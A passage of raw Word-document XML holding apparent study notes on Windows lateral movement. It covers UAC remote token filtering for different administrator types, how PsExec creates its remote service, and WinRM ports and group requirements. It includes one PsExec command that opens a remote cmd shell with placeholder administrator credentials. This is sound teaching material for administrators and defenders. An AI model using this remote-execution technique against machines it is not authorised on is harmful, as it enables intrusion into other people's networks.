        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A0B">
        <w:t xml:space="preserve"> part of the local Administrators group</w:t>
      </w:r>
      <w:r w:rsidR="000F36A1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000F36A1" w:rsidRPr="000F36A1">
        <w:t>Accounts from the domain that are added to the local Administrators group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C005FB1" w14:textId="77777777" w:rsidR="009D5966" w:rsidRDefault="009D5966" w:rsidP="009D5966"/>
    <w:p w14:paraId="5194D533" w14:textId="4B45B367" w:rsidR="009D5966" w:rsidRPr="00EA1A0B" w:rsidRDefault="009D5966" w:rsidP="009D5966">
      <w:r>
        <w:t>Windows with UAC Feature Enabled it will:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029965BB" w14:textId="14FBA8A5" w:rsidR="00F85500" w:rsidRPr="009D5966" w:rsidRDefault="009D5966" w:rsidP="009D5966">
      <w:r w:rsidRPr="009D5966">
        <w:t>By default,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5966">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5966">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local administrators</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5966">
        <w:t xml:space="preserve"> remotely connect to a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D5966">
        <w:t>machine</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D5966">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">they </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5966">
        <w:t xml:space="preserve">won't be able to perform administrative tasks </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D5966">
        <w:t>unless using</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D5966">
        <w:t xml:space="preserve"> an interactive session through </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5966">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RDP</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5966">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265CB27B" w14:textId="42D8169C" w:rsidR="00F85500" w:rsidRPr="009D5966" w:rsidRDefault="009D5966" w:rsidP="009D5966">
      <w:r w:rsidRPr="009D5966">
        <w:t xml:space="preserve">Windows will deny any administrative task requested via RPC, SMB or WinRM since such administrators will be logged in with a </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5966">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>filtered medium integrity token</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5966">
        <w:t>, preventing the account from doing privileged actions. The only local account that will get full privileges is the default Administrator account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE8A53A" w14:textId="729518E9" w:rsidR="00385468" w:rsidRPr="009D5966" w:rsidRDefault="009D5966" w:rsidP="009D5966">
      <w:r w:rsidRPr="009D5966">
        <w:t>Domain accounts with local administration privileges will be logged in with full administrative privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424D759B" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56235244" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40AC30E5" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC1AFC6" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5436368D" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AB7EF7" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRPr="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00063BAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00063BAD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧑</w:t>
      </w:r>
      <w:r w:rsidRPr="00063BAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‍</w:t>
      </w:r>
      <w:r w:rsidRPr="00063BAD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>💻</w:t>
      </w:r>
      <w:r w:rsidRPr="00063BAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Local Admins (non-default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D21CC0D" w14:textId="77777777" w:rsidR="009E1675" w:rsidRDefault="009E1675" w:rsidP="009E1675">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1675">
        <w:t>(Local user accounts created on the machine and added to the Administrators group)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDB2141" w14:textId="7B2CD1C8" w:rsidR="00063BAD" w:rsidRPr="00063BAD" w:rsidRDefault="009E1675" w:rsidP="009E1675">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1675">
        <w:t xml:space="preserve">When you use </w:t>
      </w:r>
      <w:r w:rsidRPr="009E1675">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>these accounts remotely</w:t>
      </w:r>
      <w:r w:rsidRPr="009E1675">
        <w:t xml:space="preserve"> (e.g., with </w:t>
      </w:r>
      <w:r w:rsidRPr="009E1675">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:r w:rsidRPr="009E1675">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009E1675">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="009E1675">
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="009E1675">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="009E1675">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidRPr="009E1675">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UAC applies</w:t>
      </w:r>
      <w:r w:rsidRPr="009E1675">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="009E1675">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>filtered token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>restrict</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> their access.</w:t>
      </w:r>
      <w:r w:rsidR="00063BAD" w:rsidRPr="00063BAD">
        <w:t xml:space="preserve"> unless they use RDP (interactive login).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D977402" w14:textId="44D50EA6" w:rsidR="00063BAD" w:rsidRPr="00063BAD" w:rsidRDefault="009E1675" w:rsidP="00063BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00063BAD" w:rsidRPr="00063BAD">
        <w:t xml:space="preserve"> Security </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00063BAD" w:rsidRPr="00063BAD">
        <w:t>feature</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00063BAD" w:rsidRPr="00063BAD">
        <w:t xml:space="preserve"> to prevent malware using local creds for privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464A4FCF" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRPr="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00063BAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00063BAD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧑</w:t>
      </w:r>
      <w:r w:rsidRPr="00063BAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‍</w:t>
      </w:r>
      <w:r w:rsidRPr="00063BAD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="00063BAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Default "Administrator" account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE4A54C" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRPr="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00063BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00063BAD">
        <w:t>Built-in local admin (SID: S-1-5-21-*-500).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA61A11" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRPr="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00063BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00063BAD">
        <w:t>Not affected by UAC filtering — always gets a full token, even remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6842E6A0" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRPr="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00063BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00063BAD">
        <w:t>Can perform full administrative tasks via WinRM, SMB, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69966A0E" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00063BAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00063BAD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="00063BAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Domain Admins (or domain users in local Admins group):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD57808" w14:textId="29DBC2B7" w:rsidR="009E1675" w:rsidRPr="00063BAD" w:rsidRDefault="009E1675" w:rsidP="009E1675">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1675">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(DOMAIN\John added to the local Administrators group on a machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6F846F" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRPr="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00063BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00063BAD">
        <w:t>Logged in with full tokens even remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33387F00" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRPr="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00063BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00063BAD">
        <w:t>Not restricted by UAC in the same way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196CF353" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRPr="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00063BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00063BAD">
        <w:t xml:space="preserve">Can perform remote administrative actions (e.g., using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00063BAD">
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00063BAD">
        <w:t>, WMI, PowerShell Remoting).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CC61CE" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F78FDD7" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E8E48A" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E6F925" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A78187E" w14:textId="77777777" w:rsidR="00063BAD" w:rsidRDefault="00063BAD" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C013CD8" w14:textId="389230B9" w:rsidR="00385468" w:rsidRDefault="004668D1" w:rsidP="009E1675">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="004668D1">
        <w:lastRenderedPageBreak/>
        <w:t>Spawning Processes Remotely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D6F599" w14:textId="77777777" w:rsidR="004668D1" w:rsidRDefault="004668D1" w:rsidP="004668D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="004668D1">
        <w:t>Psexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9797E7" w14:textId="7D472D95" w:rsidR="00C171E1" w:rsidRPr="00C171E1" w:rsidRDefault="00C171E1" w:rsidP="00C171E1">
      <w:r w:rsidRPr="00C171E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PsExec is a light-weight telnet-replacement that lets you</w:t>
      </w:r>
      <w:r w:rsidR="009E1675">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009E1675">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Administrator(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C171E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> execute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C171E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> processes on other systems</w:t>
      </w:r>
      <w:r w:rsidRPr="004668D1">
        <w:t>, without having to manually install client software</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on remote machine</w:t>
      </w:r>
      <w:r w:rsidRPr="004668D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C98B550" w14:textId="77777777" w:rsidR="004668D1" w:rsidRPr="004668D1" w:rsidRDefault="004668D1" w:rsidP="004668D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004668D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ports:</w:t>
      </w:r>
      <w:r w:rsidRPr="004668D1">
        <w:t> 445/TCP (SMB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6970A9E2" w14:textId="77777777" w:rsidR="004668D1" w:rsidRPr="004668D1" w:rsidRDefault="004668D1" w:rsidP="004668D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004668D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Required Group Memberships:</w:t>
      </w:r>
      <w:r w:rsidRPr="004668D1">
        <w:t> Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7631EF24" w14:textId="77777777" w:rsidR="00C171E1" w:rsidRDefault="00C171E1" w:rsidP="00C171E1">
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="00C171E1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Download link</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68482117" w14:textId="4F727CFE" w:rsidR="00C171E1" w:rsidRPr="00C171E1" w:rsidRDefault="00C171E1" w:rsidP="00C171E1">
      <w:r w:rsidRPr="00C171E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>psexec works is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA4E17D" w14:textId="0C3B997E" w:rsidR="00C171E1" w:rsidRPr="00C171E1" w:rsidRDefault="00C171E1" w:rsidP="00C171E1">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2521CD64" wp14:editId="3B6F5940">
            <wp:extent cx="4131129" cy="2466319"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="718764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9290" cy="2471191"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="636B427A" w14:textId="77777777" w:rsidR="00C171E1" w:rsidRPr="00C171E1" w:rsidRDefault="00C171E1" w:rsidP="00C171E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C171E1">
        <w:t>Connect to Admin$ share and upload a service binary. Psexec uses psexesvc.exe as the name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E21E26" w14:textId="77777777" w:rsidR="00C171E1" w:rsidRPr="00C171E1" w:rsidRDefault="00C171E1" w:rsidP="00C171E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C171E1">
        <w:t xml:space="preserve">Connect </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C171E1">
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C171E1">
        <w:t xml:space="preserve"> the service control manager to create and run a service named </w:t>
      </w:r>
      <w:r w:rsidRPr="00C171E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PSEXESVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00C171E1">
        <w:t xml:space="preserve"> and associate the service binary with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C171E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C:\Windows\psexesvc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00C171E1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F76F2AE" w14:textId="77777777" w:rsidR="00C171E1" w:rsidRDefault="00C171E1" w:rsidP="00C171E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C171E1">
        <w:t>Create some named pipes to handle stdin/stdout/stderr.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073E303D" w14:textId="03BA20C4" w:rsidR="004668D1" w:rsidRDefault="00C171E1" w:rsidP="00C171E1">
      <w:r w:rsidRPr="00C171E1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>required administrator credentials for the remote host and the command we want to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B6C59" w14:textId="43014745" w:rsidR="004668D1" w:rsidRDefault="00C171E1" w:rsidP="004668D1">
      <w:r>
        <w:t>Run Psexec Process</w:t>
      </w:r>
      <w:r w:rsidR="00065C4A">
        <w:t xml:space="preserve"> to open cmd</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708F594C" w14:textId="7043DC7B" w:rsidR="00C171E1" w:rsidRPr="00C171E1" w:rsidRDefault="00C171E1" w:rsidP="00C171E1">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00C171E1">
        <w:t>psexec64.exe \\</w:t>
      </w:r>
      <w:r w:rsidR="00065C4A">
        <w:t>Remote-</w:t>
      </w:r>
      <w:r w:rsidRPr="00C171E1">
        <w:t xml:space="preserve">MACHINE_IP -u Administrator -p </w:t>
      </w:r>
      <w:r w:rsidR="00065C4A">
        <w:t>Remote-Admin_Password</w:t>
      </w:r>
      <w:r w:rsidRPr="00C171E1">
        <w:t xml:space="preserve"> -i cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8253F6" w14:textId="2CF951C4" w:rsidR="004668D1" w:rsidRDefault="00065C4A" w:rsidP="00065C4A">
      <w:r w:rsidRPr="00065C4A">
        <w:t xml:space="preserve">If you omit a </w:t>
      </w:r>
      <w:r w:rsidR="00A160A4" w:rsidRPr="00065C4A">
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00065C4A">
        <w:t xml:space="preserve">, the process will run in the context of your account on the remote </w:t>
      </w:r>
      <w:r w:rsidR="003B5EDE" w:rsidRPr="00065C4A">
        <w:t>system but</w:t>
      </w:r>
      <w:r w:rsidRPr="00065C4A">
        <w:t xml:space="preserve"> will not have access to network resources</w:t>
      </w:r>
      <w:r w:rsidR="00A160A4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C488D94" w14:textId="77777777" w:rsidR="00A160A4" w:rsidRDefault="00A160A4" w:rsidP="00065C4A"/>
    <w:p w14:paraId="48C156CE" w14:textId="77777777" w:rsidR="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE193D">
        <w:t>Remote Process Creation Using WinRM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B80FFF4" w14:textId="6409FF81" w:rsidR="00BE193D" w:rsidRPr="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D">
      <w:r w:rsidRPr="00BE193D">
        <w:t>Windows Remote Management (WinRM) is a web-based protocol used to send PowerShell commands to Windows hosts remotely. Most Windows Server installations will have WinRM enabled by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E137520" w14:textId="77777777" w:rsidR="00BE193D" w:rsidRPr="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D"/>
    <w:p w14:paraId="7984768F" w14:textId="77777777" w:rsidR="00BE193D" w:rsidRPr="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE193D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ports:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE193D">
        <w:t> 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C557B0" w14:textId="77777777" w:rsidR="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00BE193D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE193D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Required Group Memberships:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE193D">
        <w:t> Remote Management Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F485550" w14:textId="7106CAB5" w:rsidR="00BE193D" w:rsidRDefault="00BE193D" w:rsidP="00AA2A4B">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run Winrs</w:t>
      </w:r>
      <w:r w:rsidR="00AA2A4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00AA2A4B" w:rsidRPr="00AA2A4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Remote Shell</w:t>
      </w:r>
      <w:r w:rsidR="00AA2A4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidR="00AA2A4B" w:rsidRPr="00AA2A4B">
        <w:t>run remote commands on another Windows machine over WinRM (Windows Remote Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6023DBCF" w14:textId="4FBDB650" w:rsidR="00AA2A4B" w:rsidRPr="00BE193D" w:rsidRDefault="00AA2A4B" w:rsidP="00AA2A4B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
